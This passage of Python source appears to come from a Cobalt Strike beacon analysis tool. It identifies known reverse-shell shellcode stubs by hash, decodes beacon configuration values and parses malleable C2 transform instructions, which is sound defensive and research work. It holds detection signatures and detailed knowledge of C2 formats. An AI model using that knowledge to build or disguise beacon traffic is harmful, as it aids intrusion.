        encoded = encoded.strip()
        oDumpStream = self.cDumpStream(self.prefix)
        length = 64
        for i in range(0, len(encoded), length):
            oDumpStream.Addline(encoded[0+i:length+i])
        return oDumpStream.Content()
    class cDumpStream():
        # Collects non-empty output lines, each prefixed with prefix.
        def __init__(self, prefix=''):
            self.oStringIO = StringIO()
            self.prefix = prefix
        def Addline(self, line):
            if line != '':
                self.oStringIO.write(self.prefix + line + '\n')
        def Content(self):
            return self.oStringIO.getvalue()
    @staticmethod
    def C2IIP2(data):
        # Byte -> int, compatible with Python 2 (str element) and 3 (int element).
        if sys.version_info[0] > 2:
            return data
        else:
            return ord(data)
#-ENDCODE cDump--------------------------------------------------------------------------------------
def IfWIN32SetBinary(io):
    """On Windows, switch the given file object to binary mode; no-op elsewhere."""
    if sys.platform != 'win32':
        return
    import msvcrt
    msvcrt.setmode(io.fileno(), os.O_BINARY)
#Fix for http://bugs.python.org/issue11395
def StdoutWriteChunked(data):
    """Write binary data to stdout.

    On Python 2, write in 10000-byte chunks with a flush after each chunk
    to work around http://bugs.python.org/issue11395; stop silently when
    the flush fails (e.g. a closed pipe).
    """
    if sys.version_info[0] > 2:
        sys.stdout.buffer.write(data)
        return
    position = 0
    while position < len(data):
        sys.stdout.write(data[position:position + 10000])
        try:
            sys.stdout.flush()
        except IOError:
            return
        position += 10000
class cVariables():
    """Simple %name% template variables parsed from 'name=value' pairs."""
    def __init__(self, variablesstring='', separator=DEFAULT_SEPARATOR):
        self.dVariables = {}
        if variablesstring != '':
            for definition in variablesstring.split(separator):
                name, value = VariableNameValue(definition)
                self.dVariables[name] = value
    def SetVariable(self, name, value):
        self.dVariables[name] = value
    def Instantiate(self, astring):
        """Replace every %name% occurrence in astring with its value."""
        for name, value in self.dVariables.items():
            astring = astring.replace('%' + name + '%', value)
        return astring
class cOutput():
    """Output sink writing to console and/or file.

    filenameOption may start with '#switches#filename'; switches: s separate
    output file per input file, p progress to stderr, c echo to console too,
    l ignored here, g generate a timestamped filename, h head (first 10
    lines only), t tail (last 10 lines only).
    """
    def __init__(self, filenameOption=None):
        self.starttime = time.time()
        self.filenameOption = filenameOption
        self.separateFiles = False
        self.progress = False
        self.console = False
        self.head = False
        self.headCounter = 0
        self.tail = False
        self.tailQueue = []
        self.fOut = None
        self.rootFilenames = {}
        if self.filenameOption:
            if self.ParseHash(self.filenameOption):
                if not self.separateFiles and self.filename != '':
                    self.fOut = open(self.filename, 'w')
            elif self.filenameOption != '':
                self.fOut = open(self.filenameOption, 'w')
        self.dReplacements = {}
    def Replace(self, line):
        # Apply all registered string replacements to an output line.
        for key, value in self.dReplacements.items():
            line = line.replace(key, value)
        return line
    def ParseHash(self, option):
        # Parse a '#switches#filename' option; returns True when it was one.
        if option.startswith('#'):
            position = self.filenameOption.find('#', 1)
            if position > 1:
                switches = self.filenameOption[1:position]
                self.filename = self.filenameOption[position + 1:]
                for switch in switches:
                    if switch == 's':
                        self.separateFiles = True
                    elif switch == 'p':
                        self.progress = True
                    elif switch == 'c':
                        self.console = True
                    elif switch == 'l':
                        pass
                    elif switch == 'g':
                        # Generate a '<tool>[-name]-<timestamp>.txt' filename.
                        if self.filename != '':
                            extra = self.filename + '-'
                        else:
                            extra = ''
                        self.filename = '%s-%s%s.txt' % (os.path.splitext(os.path.basename(sys.argv[0]))[0], extra, self.FormatTime())
                    elif switch == 'h':
                        self.head = True
                    elif switch == 't':
                        self.tail = True
                    else:
                        return False
                return True
        return False
    @staticmethod
    def FormatTime(epoch=None):
        # Local time formatted as YYYYMMDD-HHMMSS.
        if epoch == None:
            epoch = time.time()
        return '%04d%02d%02d-%02d%02d%02d' % time.localtime(epoch)[0:6]
    def RootUnique(self, root):
        # Return root, made unique with a _NNNN suffix when already used.
        if not root in self.rootFilenames:
            self.rootFilenames[root] = None
            return root
        iter = 1
        while True:
            newroot = '%s_%04d' % (root, iter)
            if not newroot in self.rootFilenames:
                self.rootFilenames[newroot] = None
                return newroot
            iter += 1
    def LineSub(self, line, eol):
        line = self.Replace(line)
        if self.fOut == None or self.console:
            try:
                print(line, end=eol)
            except UnicodeEncodeError:
                # Fall back to backslash escapes for characters stdout cannot encode.
                encoding = sys.stdout.encoding
                print(line.encode(encoding, errors='backslashreplace').decode(encoding), end=eol)
#            sys.stdout.flush()
        if self.fOut != None:
            self.fOut.write(line + '\n')
            self.fOut.flush()
    def Line(self, line, eol='\n'):
        # head/tail filtering: emit the first 10 lines and/or queue the last 10.
        if self.head:
            if self.headCounter < 10:
                self.LineSub(line, eol)
            elif self.tail:
                self.tailQueue = self.tailQueue[-9:] + [[line, eol]]
            self.headCounter += 1
        elif self.tail:
            self.tailQueue = self.tailQueue[-9:] + [[line, eol]]
        else:
            self.LineSub(line, eol)
    def LineTimestamped(self, line):
        self.Line('%s: %s' % (self.FormatTime(), line))
    def Filename(self, filename, index, total):
        """Register the current input file; handles progress and per-file output."""
        self.separateFilename = filename
        if self.progress:
            if index == 0:
                eta = ''
            else:
                # Linear ETA from average elapsed time per processed file.
                seconds = int(float((time.time() - self.starttime) / float(index)) * float(total - index))
                eta = 'estimation %d seconds left, finished %s ' % (seconds, self.FormatTime(time.time() + seconds))
            PrintError('%d/%d %s%s' % (index + 1, total, eta, self.separateFilename))
        if self.separateFiles and self.filename != '':
            # Instantiate %f %b %d %r %ru %e variables in the output filename.
            oFilenameVariables = cVariables()
            oFilenameVariables.SetVariable('f', self.separateFilename)
            basename = os.path.basename(self.separateFilename)
            oFilenameVariables.SetVariable('b', basename)
            oFilenameVariables.SetVariable('d', os.path.dirname(self.separateFilename))
            root, extension = os.path.splitext(basename)
            oFilenameVariables.SetVariable('r', root)
            oFilenameVariables.SetVariable('ru', self.RootUnique(root))
            oFilenameVariables.SetVariable('e', extension)
            self.Close()
            self.fOut = open(oFilenameVariables.Instantiate(self.filename), 'w')
    def Close(self):
        # Flush any queued tail lines before closing the output file.
        if self.head and self.tail and len(self.tailQueue) > 0:
            self.LineSub('...', '\n')
        for line, eol in self.tailQueue:
            self.LineSub(line, eol)
        self.headCounter = 0
        self.tailQueue = []
        if self.fOut != None:
            self.fOut.close()
            self.fOut = None
def ToString(value):
    """Return value unchanged when it is already a str, else str(value)."""
    return value if isinstance(value, str) else str(value)
def Quote(value, separator, quote):
    """Quote value for CSV output when it contains the separator or is empty.

    Values already wrapped in the quote character are left untouched.
    """
    # Inline string conversion (same behavior as ToString).
    if not isinstance(value, str):
        value = str(value)
    alreadyQuoted = len(value) > 1 and value[0] == quote and value[-1] == quote
    if alreadyQuoted:
        return value
    needsQuoting = separator in value or value == ''
    return quote + value + quote if needsQuoting else value
def MakeCSVLine(row, separator=',', quote='"'):
    """Join row values into one CSV line, quoting values that need it."""
    return separator.join(Quote(value, separator, quote) for value in row)
class cLogfile():
    """CSV logfile writer: records a header with environment details at
    start and a summary (error count, duration) at Close. Logging is
    disabled entirely when keyword is ''."""
    def __init__(self, keyword, comment):
        self.starttime = time.time()
        self.errors = 0
        if keyword == '':
            self.oOutput = None
        else:
            self.oOutput = cOutput('%s-%s-%s.log' % (os.path.splitext(os.path.basename(sys.argv[0]))[0], keyword, self.FormatTime()))
        self.Line('Start')
        self.Line('UTC', '%04d%02d%02d-%02d%02d%02d' % time.gmtime(time.time())[0:6])
        self.Line('Comment', comment)
        self.Line('Args', repr(sys.argv))
        self.Line('Version', __version__)
        self.Line('Python', repr(sys.version_info))
        self.Line('Platform', sys.platform)
        self.Line('CWD', repr(os.getcwd()))
    @staticmethod
    def FormatTime(epoch=None):
        # Local time formatted as YYYYMMDD-HHMMSS.
        if epoch == None:
            epoch = time.time()
        return '%04d%02d%02d-%02d%02d%02d' % time.localtime(epoch)[0:6]
    def Line(self, *line):
        # Every record is timestamped and CSV-quoted; no-op when logging is off.
        if self.oOutput != None:
            self.oOutput.Line(MakeCSVLine((self.FormatTime(), ) + line, DEFAULT_SEPARATOR, QUOTE))
    def LineError(self, *line):
        self.Line('Error', *line)
        self.errors += 1
    def Close(self):
        if self.oOutput != None:
            self.Line('Finish', '%d error(s)' % self.errors, '%d second(s)' % (time.time() - self.starttime))
            self.oOutput.Close()
def CalculateByteStatistics(dPrevalence=None, data=None):
    """Compute byte-frequency statistics.

    Pass either a prevalence dictionary (byte value -> count) or raw data
    to be counted. Returns (total bytes, entropy, unique byte count, NUL
    count, control count, whitespace count, printable count, high-byte
    count, hex-digit count, base64-charset count, average consecutive byte
    difference); the last value is None when data has fewer than 2 bytes.
    """
    averageConsecutiveByteDifference = None
    if dPrevalence == None:
        dPrevalence = {iter: 0 for iter in range(0x100)}
        sumDifferences = 0.0
        previous = None
        if len(data) > 1:
            for byte in data:
                byte = C2IIP2(byte)
                dPrevalence[byte] += 1
                if previous != None:
                    sumDifferences += abs(byte - previous)
                previous = byte
            averageConsecutiveByteDifference = sumDifferences /float(len(data)-1)
    sumValues = sum(dPrevalence.values())
    countNullByte = dPrevalence[0]
    countControlBytes = 0
    countWhitespaceBytes = 0
    countUniqueBytes = 0
    # 0x01-0x20: split between whitespace and control characters.
    for iter in range(1, 0x21):
        if chr(iter) in string.whitespace:
            countWhitespaceBytes += dPrevalence[iter]
        else:
            countControlBytes += dPrevalence[iter]
    countControlBytes += dPrevalence[0x7F]
    countPrintableBytes = 0
    for iter in range(0x21, 0x7F):
        countPrintableBytes += dPrevalence[iter]
    countHighBytes = 0
    for iter in range(0x80, 0x100):
        countHighBytes += dPrevalence[iter]
    countHexadecimalBytes = 0
    countBASE64Bytes = 0
    # Digits 0-9 count towards both the hexadecimal and BASE64 alphabets.
    for iter in range(0x30, 0x3A):
        countHexadecimalBytes += dPrevalence[iter]
        countBASE64Bytes += dPrevalence[iter]
    for iter in range(0x41, 0x47):
        countHexadecimalBytes += dPrevalence[iter]
    for iter in range(0x61, 0x67):
        countHexadecimalBytes += dPrevalence[iter]
    for iter in range(0x41, 0x5B):
        countBASE64Bytes += dPrevalence[iter]
    for iter in range(0x61, 0x7B):
        countBASE64Bytes += dPrevalence[iter]
    countBASE64Bytes += dPrevalence[ord('+')] + dPrevalence[ord('/')] + dPrevalence[ord('=')]
    # Shannon entropy over the byte distribution.
    entropy = 0.0
    for iter in range(0x100):
        if dPrevalence[iter] > 0:
            prevalence = float(dPrevalence[iter]) / float(sumValues)
            entropy += - prevalence * math.log(prevalence, 2)
            countUniqueBytes += 1
    return sumValues, entropy, countUniqueBytes, countNullByte, countControlBytes, countWhitespaceBytes, countPrintableBytes, countHighBytes, countHexadecimalBytes, countBASE64Bytes, averageConsecutiveByteDifference
def GetChunk(position, data):
    """Split data at position and return [head, tail]."""
    head = data[:position]
    tail = data[position:]
    return [head, tail]
def InstantiateCOutput(options):
    """Create a cOutput writing to options.output when it is set, else to stdout."""
    if options.output != '':
        return cOutput(options.output)
    return cOutput(None)
class UnpackErrorNotEnoughData(Exception):
    """Raised by Unpack when the buffer is shorter than the struct format requires."""
    pass
def Unpack(format, data):
    """struct-unpack format from the head of data.

    Returns the unpacked values as a list with the remaining bytes appended;
    raises UnpackErrorNotEnoughData when data is too short.
    """
    size = struct.calcsize(format)
    if len(data) < size:
        raise UnpackErrorNotEnoughData()
    head, tail = data[:size], data[size:]
    return list(struct.unpack(format, head)) + [tail]
def Represent(data):
    """repr() of data without trailing NULs; '(NULL ...)' when all characters are NUL."""
    if any(ord(c) != 0 for c in data):
        return repr(data.rstrip('\x00'))
    return '(NULL ...)'
def PrefixIfNeeded(string, prefix=' '):
    """Prepend prefix to string unless string is empty."""
    return prefix + string if string != '' else string
def Xor(data, key):
    """XOR data with a repeating key; returns the result via C2BIP3 (bytes on Python 3)."""
    data = C2SIP3(data)
    key = C2SIP3(key)
    keylength = len(key)
    xored = [chr(ord(character) ^ ord(key[index % keylength])) for index, character in enumerate(data)]
    return C2BIP3(''.join(xored))
def FindAll(data, sub):
    """Return all (possibly overlapping) positions of sub in data, ascending."""
    positions = []
    searchfrom = 0
    while True:
        hit = data.find(sub, searchfrom)
        if hit == -1:
            break
        positions.append(hit)
        # Advance one byte to also catch overlapping occurrences.
        searchfrom = hit + 1
    return positions
def FindAllList(data, searches):
    """Return the sorted, deduplicated positions of all search terms in data."""
    positions = set()
    for term in searches:
        positions.update(FindAll(data, term))
    return sorted(positions)
def DecodeSectionnameIfNeeded(name):
    """Undo single-byte XOR obfuscation of a PE section name.

    Names that are empty or already start with '.' are returned unchanged;
    otherwise the XOR key is recovered assuming the first character should
    be '.', and trailing NULs are stripped from the decoded name.
    """
    if name == '' or name[0] == '.':
        return name
    xorkey = ord(name[0]) ^ ord('.')
    decoded = ''.join(chr(ord(character) ^ xorkey) for character in name)
    return decoded.rstrip('\x00')
def GetDataSection(data):
    """Return (error, bytes) for the .data section of a PE file.

    Section names are passed through DecodeSectionnameIfNeeded to undo
    single-byte XOR obfuscation. On success error is None; otherwise error
    describes the problem and bytes is None.
    """
    sectionnames = []
    try:
        oPE = pefile.PE(data=data)
    except Exception as e:
        # NOTE(review): relies on the raised exception exposing a .value
        # attribute (pefile.PEFormatError does); confirm other exceptions
        # cannot reach this handler.
        return e.value, None
    for section in oPE.sections:
        # Section.Name is bytes on Python 3; strip embedded NULs either way.
        if sys.version_info[0] >= 3:
            sectionname = ''.join(filter(lambda c:c != '\0', str(section.Name.decode('unicode_escape'))))
        else:
            sectionname = ''.join(filter(lambda c:c != '\0', section.Name))
        sectionnames.append(repr(sectionname))
        if DecodeSectionnameIfNeeded(sectionname) == '.data':
            return None, section.get_data()
    return '.data section not found: ' + ' '.join(sectionnames), None
def GetXorChainSection(data):
    """Try XOR-chain decoding on every section of a PE file.

    Returns (extracted, messages) from the first section that yields
    messages, (None, errorvalue) on a pefile parsing error, and
    (None, None) when no section decodes.
    """
    try:
        oPE = pefile.PE(data=data)
    except Exception as e:
        # NOTE(review): assumes the exception exposes .value (pefile.PEFormatError).
        return None, e.value
    for section in oPE.sections:
        extracted, messages = TryXORChainDecoding(section.get_data())
        if messages != []:
            return extracted, messages
    return None, None
def StatisticalSearch(payloadsectiondata, key):
    """Locate the span of 8-byte blocks where the key byte is prevalent.

    A block qualifies when more than 2 of its 8 bytes equal key. Returns
    (start, end) byte positions of the first/last qualifying block, or
    (None, None) when no block qualifies.
    """
    start = None
    end = None
    position = 0
    while len(payloadsectiondata) > 8:
        block, payloadsectiondata = GetChunk(8, payloadsectiondata)
        keycount = sum(1 for c in block if c == key)
        if keycount > 2:
            if start == None:
                start = position
            end = position + 7
        position += 8
    return start, end
def Bytes2IPv4(data):
    """Format the first 4 bytes of data as a dotted-quad IPv4 address."""
    octets = [P23Ord(data[index]) for index in range(4)]
    return '%d.%d.%d.%d' % tuple(octets)
def FindAF_INET_PORT(operand):
    """Return the port as a string when operand starts like a sockaddr_in
    (family AF_INET = 2 little-endian, then big-endian port); else ''."""
    if P23Ord(operand[0]) != 2 or P23Ord(operand[1]) != 0:
        return ''
    return '%d' % struct.unpack('>H', operand[2:4])[0]
def IdentifyShellcode(shellcode):
    """Identify known Cobalt Strike shellcode stubs by the SHA-256 of a
    fixed-length prefix; return a description or '' when unknown."""
    # (prefix length, sha256 hexdigest of that prefix, description)
    knownShellcodes = [
        (346, '946af5a23e5403ea1caccb2e0988ec1526b375a3e919189f16491eeabc3e7d8c', 'CS psexec psh x86 shellcode, opens named pipe'),
        (191, '02fd615831f5cc22d83ad681d33159d232afc3b18b69f647f1726280e2d7e3f3', 'CS reverse http x86 shellcode'),
        (271, 'bf413ba9b63b6777c4765581bf42c1fdb119f1ed22836cfaa80e616e2a3bf795', 'CS reverse http x64 shellcode'),
        (196, '52230666746fa8c9ec635083b05943d02bfe516fc45ea9c87eef300b9cd064e8', 'CS reverse https x86 shellcode'),
        (274, 'acffe4f9fd8f82044772627a4174f14abf873a8e783c31353bf094118f3c1706', 'CS reverse https x64 shellcode'),
        (330, 'a82872e2d839cd2ee1b0c2324b83f2686284ebe3eef5e9fb0c9e97db8d86cbf4', 'CS DNS x86 shellcode'),
    ]
    for prefixlength, digest, description in knownShellcodes:
        if hashlib.sha256(shellcode[:prefixlength]).hexdigest() == digest:
            return description
    return ''
def AnalyzeShellcode(shellcode, oOutput):
    """Report notable patterns in Cobalt Strike shellcode via oOutput:
    identification hash, trailing parameter/license-id, push/mov operands
    (candidate IPv4 addresses and ports) and interesting ASCII strings."""
    dInstructions = {b'\x68': 'push', b'\xB8': 'mov eax'}
    dJSONData = GetJSONData()
    dLookupValues = dJSONData.get('dLookupValues', {})
    identification = IdentifyShellcode(shellcode)
    if identification != '':
        oOutput.Line('Identification: %s' % identification)
    # The parameter block follows the last 0xFFFF marker.
    position = shellcode.rfind(b'\xFF\xFF')
    if position != -1:
        parameters = shellcode[position+2:]
        position00 = parameters.find(b'\x00')
        remainder = b''
        if position00 != -1:
            remainder = parameters[position00 + 1:]
            parameters = parameters[:position00]
        oOutput.Line('Parameter: %d %s' % (position, repr(parameters)))
        if len(remainder) == 4:
            # Exactly 4 remaining bytes: big-endian license id.
            licenseid = struct.unpack('>I',remainder)[0]
            info = 'license-id: %d %d' % (position + position00 + 1, licenseid)
            info += LookupValue("37", '%d' % licenseid, dLookupValues)
            oOutput.Line(info)
    # Dump operands of push (0x68) and mov eax (0xB8) instructions.
    for pushPosition in FindAllList(shellcode, dInstructions.keys()):
        if pushPosition + 5 <= len(shellcode):
            if position == -1:
                operand = shellcode[pushPosition + 1:pushPosition + 5]
                oOutput.Line('%-10s: %5d %10d %5s %-16s %s' % (dInstructions[shellcode[pushPosition:pushPosition+1]], pushPosition, struct.unpack('<I', operand)[0], FindAF_INET_PORT(operand), Bytes2IPv4(operand), repr(shellcode[pushPosition:pushPosition + 5])))
            elif shellcode[pushPosition + 3:pushPosition + 5] == b'\x00\x00':
                oOutput.Line('%-10s: %5d %10d %s' % (dInstructions[shellcode[pushPosition:pushPosition+1]], pushPosition, struct.unpack('<H', shellcode[pushPosition + 1:pushPosition + 3])[0], repr(shellcode[pushPosition:pushPosition + 5])))
    # NOTE(review): 'str' shadows the builtin in this loop; kept as-is.
    for str in ExtractStringsASCII(shellcode):
        if len(str) == 5 and str.startswith(b'/') or str.startswith(b'User-Agent: ') or str.startswith(b'Mozilla/'):
            positions = FindAll(shellcode, str)
            oOutput.Line('String: %s %s' % (','.join(['%d' % position for position in positions]),str))
# Byte-level regex class: TAB plus printable ASCII (0x20-0x7E).
REGEX_STANDARD = b'[\x09\x20-\x7E]'

def ExtractStringsASCII(data):
    """Return every run (length >= 1) of printable ASCII bytes in data."""
    return re.findall(REGEX_STANDARD + b'{1,}', data)
def LookupConfigValue(id, value):
    """Translate a raw config value into a human-readable label.

    Supported entries: 0x0001 (payload type), 0x0023 (proxy type),
    0x002b/0x002c (process-inject memory protection flags).
    Returns '' (via PrefixIfNeeded) when the value is unknown.
    Fix: payload type 2 label was misspelled 'bind_pipz' -> 'bind_pipe'.
    """
    dConfigValues = {
        0x0001: {
            0: 'windows-beacon_http-reverse_http',
            1: 'windows-beacon_dns-reverse_http',
            2: 'windows-beacon_smb-bind_pipe',
            4: 'windows-beacon_tcp-reverse_tcp',
            8: 'windows-beacon_https-reverse_https',
            16: 'windows-beacon_tcp-bind_tcp',
            32: 'to be determined',
        },
        0x0023: {
            1: 'no proxy',
            2: 'IE settings',
            4: 'hardcoded proxy',
        },
        0x002b: {
            # Windows PAGE_* memory protection constants.
            0x01: 'PAGE_NOACCESS',
            0x02: 'PAGE_READONLY',
            0x04: 'PAGE_READWRITE',
            0x08: 'PAGE_WRITECOPY',
            0x10: 'PAGE_EXECUTE',
            0x20: 'PAGE_EXECUTE_READ',
            0x40: 'PAGE_EXECUTE_READWRITE',
            0x80: 'PAGE_EXECUTE_WRITECOPY',
        },
    }
    return PrefixIfNeeded(dConfigValues[id].get(value, ''))
def ConvertIntToIPv4(value):
    """Render a 4-byte value as ' a.b.c.d' (note the leading space)."""
    octets = [C2IIP2(value[index]) for index in range(4)]
    return ' %d.%d.%d.%d' % tuple(octets)
def ToHexadecimal(value):
    """Return a lowercase hexadecimal string for an int or a bytes-like value."""
    if not isinstance(value, int):
        return binascii.b2a_hex(value).decode()
    return '%x' % value
def LookupValue(number, value, dInfo, verbose=False):
    """Look up `value` for entry `number` in dInfo.

    An entry may be a plain string or a dict with 'normal'/'verbose' texts.
    Returns the text prefixed (via PrefixIfNeeded), or '' when not found.
    """
    found = dInfo.get(number, {}).get(value, '')
    if isinstance(found, dict):
        text = found['normal']
        if verbose:
            text = '%s (%s)' % (text, found['verbose'])
        found = text
    return PrefixIfNeeded(found)
def InterpretValue(info, number, value, dConfigValueInterpreter):
    """Append the interpreter's rendering of `value` to `info`, when entry
    `number` has a registered interpreter; otherwise return `info` unchanged."""
    interpreter = dConfigValueInterpreter.get(number)
    if interpreter is None:
        return info
    return info + interpreter(value)
def GetScriptPath():
    """Return the directory of the running script (or of the frozen executable)."""
    source = sys.executable if getattr(sys, 'frozen', False) else sys.argv[0]
    return os.path.dirname(source)
def DetermineCSVersionFromConfig(dJSON):
    """Guess the Cobalt Strike version from the highest config entry number.

    Returns (versionstring, maximumID).
    """
    maximumID = max(map(int, dJSON.keys()))
    if maximumID < 55:
        version = '3'
    elif maximumID == 55:
        version = '4.0'
    elif 55 < maximumID < 58:
        version = '4.1'
    elif maximumID == 58:
        version = '4.2'
    elif maximumID == 70:
        version = '4.3'
    else:
        version = '4.4'
    return (version, maximumID)
def SanityCheckExtractedConfig(dJSON):
    """Heuristic check that an extracted config looks like a real beacon config."""
    if 1 not in dJSON or 7 not in dJSON:
        return False
    # Entry 1 (payload type) must map to a known beacon type.
    if LookupConfigValue(1, dJSON[1]['rawvalue']) == '':
        return False
    rawPublicKey = dJSON[7]['rawvalue']
    # Entry 7 (public key) must be hex text starting with a DER SEQUENCE ('308...').
    return isinstance(rawPublicKey, str) and rawPublicKey.startswith('308')
def GetJSONData():
    """Load 1768b.json (preferred) or 1768.json from the script's directory.

    Returns the parsed dictionary, or {} when neither file exists.
    Fix: use a context manager so file handles are closed deterministically
    (the original relied on the garbage collector).
    """
    for jsonFilename in ['1768b.json', '1768.json']:
        filename = os.path.join(GetScriptPath(), jsonFilename)
        if os.path.isfile(filename):
            with open(filename, 'r') as fJSON:
                return json.load(fJSON)
    return {}
class cStruct(object):
    """Sequential reader over a bytes buffer, wrapping the struct module.

    self.data holds the unread remainder; self.originaldata the full buffer.
    """

    def __init__(self, data):
        self.data = data
        self.originaldata = data

    def Unpack(self, format):
        """Consume and unpack struct `format`; a single value is returned bare,
        multiple values as a tuple. Raises Exception when data is exhausted."""
        formatsize = struct.calcsize(format)
        if len(self.data) < formatsize:
            raise Exception('Not enough data')
        tounpack = self.data[:formatsize]
        self.data = self.data[formatsize:]
        result = struct.unpack(format, tounpack)
        if len(result) == 1:
            return result[0]
        else:
            return result

    def Truncate(self, length):
        """Discard everything after the first `length` unread bytes."""
        self.data = self.data[:length]

    def GetBytes(self, length=None):
        """Consume and return `length` bytes (default: all remaining bytes)."""
        if length is None:  # idiom fix: was '== None'
            length = len(self.data)
        result = self.data[:length]
        self.data = self.data[length:]
        return result

    def GetString(self, format):
        """Consume a length field (struct `format`) followed by that many bytes."""
        stringLength = self.Unpack(format)
        return self.GetBytes(stringLength)

    def Length(self):
        """Number of unread bytes."""
        return len(self.data)
# https://www.usualsuspect.re/article/cobalt-strikes-malleable-c2-under-the-hood
# Context in which a malleable C2 transform program is interpreted:
INSTRUCTION_TYPE_MALLEABLE_C2 = 1  # config entry 0x0b: server->beacon input transform
INSTRUCTION_TYPE_GET = 2           # config entry 0x0c: http-get client transform
INSTRUCTION_TYPE_POST = 3          # config entry 0x0d: http-post client transform
# Transform program opcodes (stored as big-endian 32-bit integers):
INSTRUCTION_NONE = 0               # terminates the program
INSTRUCTION_APPEND = 1             # append string (or: remove N bytes from end, for type 1)
INSTRUCTION_PREPEND = 2            # prepend string (or: remove N bytes from begin, for type 1)
INSTRUCTION_BASE64 = 3
INSTRUCTION_PRINT = 4
INSTRUCTION_PARAMETER = 5          # store in URI parameter
INSTRUCTION_HEADER = 6             # store in HTTP header
INSTRUCTION_BUILD = 7              # start of a Build block (metadata/sessionid/output)
INSTRUCTION_NETBIOS = 8            # NetBIOS encode, lowercase
INSTRUCTION_CONST_PARAMETER = 9    # constant URI parameter
INSTRUCTION_CONST_HEADER = 10      # constant HTTP header
INSTRUCTION_NETBIOSU = 11          # NetBIOS encode, uppercase
INSTRUCTION_URI_APPEND = 12
INSTRUCTION_BASE64URL = 13
INSTRUCTION_STRREP = 14            # string replace
INSTRUCTION_MASK = 15              # XOR with 4-byte random key
INSTRUCTION_CONST_HOST_HEADER = 16
def DecodeInstructions(value, instructionsType):
    """Decode a malleable C2 transform program (config entries 0x0b/0x0c/0x0d).

    value: stream of big-endian 32-bit opcodes with inline operands;
    instructionsType: one of the INSTRUCTION_TYPE_* constants (changes how
    APPEND/PREPEND/BUILD operands are interpreted).
    Returns [instructions, opcodes]: parallel lists of human-readable strings
    and raw [opcode, operand...] string lists; Build ... Build End runs are
    grouped into sublists in a post-processing pass.
    """
    oStruct = cStruct(value)
    instructions = []
    opcodes = []
    buildFlag = False
    while oStruct.Length() >= 4:
        opcode = oStruct.Unpack('>I')
        # Opcodes 0/6/7/10/16 implicitly terminate an open Build block.
        if buildFlag and opcode in [0, 6, 7, 10, 16]:
            instructions.append('Build End')
            opcodes.append(['7', 'End'])
            buildFlag = False
        if opcode == INSTRUCTION_NONE:
            break
        if opcode == INSTRUCTION_APPEND:
            # For the server->beacon program, APPEND means "remove N bytes from
            # the end"; for client programs it appends a literal string.
            if instructionsType == INSTRUCTION_TYPE_MALLEABLE_C2:
                operand = oStruct.Unpack('>I')
                instructions.append('Remove %d bytes from end' % operand)
                opcodes.append([str(opcode), str(operand)])
            else:
                operand = oStruct.GetString('>I').decode('latin')
                instructions.append('Append %s' % operand)
                opcodes.append([str(opcode), operand])
        elif opcode == INSTRUCTION_PREPEND:
            # Same duality as APPEND, but for the start of the data.
            if instructionsType == INSTRUCTION_TYPE_MALLEABLE_C2:
                operand = oStruct.Unpack('>I')
                instructions.append('Remove %d bytes from begin' % operand)
                opcodes.append([str(opcode), str(operand)])
            else:
                operand = oStruct.GetString('>I').decode('latin')
                instructions.append('Prepend %s' % operand)
                opcodes.append([str(opcode), operand])
        elif opcode == INSTRUCTION_BASE64:
            instructions.append('BASE64')
            opcodes.append([str(opcode)])
        elif opcode == INSTRUCTION_PRINT:
            instructions.append('Print')
            opcodes.append([str(opcode)])
        elif opcode == INSTRUCTION_PARAMETER:
            operand = oStruct.GetString('>I').decode('latin')
            instructions.append('Parameter %s' % operand)
            opcodes.append([str(opcode), operand])
        elif opcode == INSTRUCTION_HEADER:
            operand = oStruct.GetString('>I').decode('latin')
            instructions.append('Header %s' % operand)
            opcodes.append([str(opcode), operand])
        elif opcode == INSTRUCTION_BUILD:
            # Start of a Build block; the operand selects what is being built.
            buildFlag = True
            operand = oStruct.Unpack('>I')
            if instructionsType == INSTRUCTION_TYPE_POST:
                if operand == 0:
                    operand = 'SessionId'
                else:
                    operand = 'Output'
            else:
                operand = 'Metadata'
            instructions.append('Build %s' % operand)
            opcodes.append([str(opcode), operand])
        elif opcode == INSTRUCTION_NETBIOS:
            instructions.append('NETBIOS lowercase')
            opcodes.append([str(opcode)])
        elif opcode == INSTRUCTION_CONST_PARAMETER:
            operand = oStruct.GetString('>I').decode('latin')
            instructions.append('Const_parameter %s' % operand)
            opcodes.append([str(opcode), operand])
        elif opcode == INSTRUCTION_CONST_HEADER:
            operand = oStruct.GetString('>I').decode('latin')
            instructions.append('Const_header %s' % operand)
            opcodes.append([str(opcode), operand])
        elif opcode == INSTRUCTION_NETBIOSU:
            instructions.append('NETBIOS uppercase')
            opcodes.append([str(opcode)])
        elif opcode == INSTRUCTION_URI_APPEND:
            instructions.append('Uri_append')
            opcodes.append([str(opcode)])
        elif opcode == INSTRUCTION_BASE64URL:
            instructions.append('BASE64 URL')
            opcodes.append([str(opcode)])
        elif opcode == INSTRUCTION_STRREP:
            # Two string operands: search value and replacement value.
            operand1 = oStruct.GetString('>I').decode('latin')
            operand2 = oStruct.GetString('>I').decode('latin')
            instructions.append('STRREP %s %s' % (operand1, operand2))
            opcodes.append([str(opcode), operand1, operand2])
        elif opcode == INSTRUCTION_MASK:
            instructions.append('XOR with 4-byte random key')
            opcodes.append([str(opcode)])
        elif opcode == INSTRUCTION_CONST_HOST_HEADER:
            operand = oStruct.GetString('>I').decode('latin')
            instructions.append('Const_host_header %s' % operand)
            opcodes.append([str(opcode), operand])
        else:
            instructions.append('Unknown instruction: 0x%02x' % opcode)
            opcodes.append([str(opcode)])
    # Post-processing pass 1: group 'Build ...' up to 'Build End' into sublists.
    result = []
    buildFlag = False
    for instruction in instructions:
        if instruction == 'Build End':
            result.append(build)
        elif instruction.startswith('Build '):
            build = [instruction]
            buildFlag= True
        elif buildFlag:
            build.append(instruction)
        else:
            result.append(instruction)
    instructions = result
    # Post-processing pass 2: same grouping for the raw opcode lists.
    result = []
    buildFlag = False
    for opcode in opcodes:
        if opcode == ['7', 'End']:
            result.append(build)
        elif opcode[0] == '7':
            build = [opcode]
            buildFlag= True
        elif buildFlag:
            build.append(opcode)
        else:
            result.append(opcode)
    opcodes = result
    # For the server->beacon program, wrap everything in one implicit
    # 'Transform Input' block.
    if instructionsType == INSTRUCTION_TYPE_MALLEABLE_C2:
        instructions = [['Transform Input'] + instructions]
        opcodes = [[['7', 'Input']] + opcodes]
    return [instructions, opcodes]
def DecodeMalleableC2Instructions(parameter):
    """Render the entry-0x0b transform program as a one-line summary string.

    NOTE(review): for INSTRUCTION_TYPE_MALLEABLE_C2, DecodeInstructions wraps
    its results in an extra list level; verify that the joins below handle
    that nested shape as intended.
    """
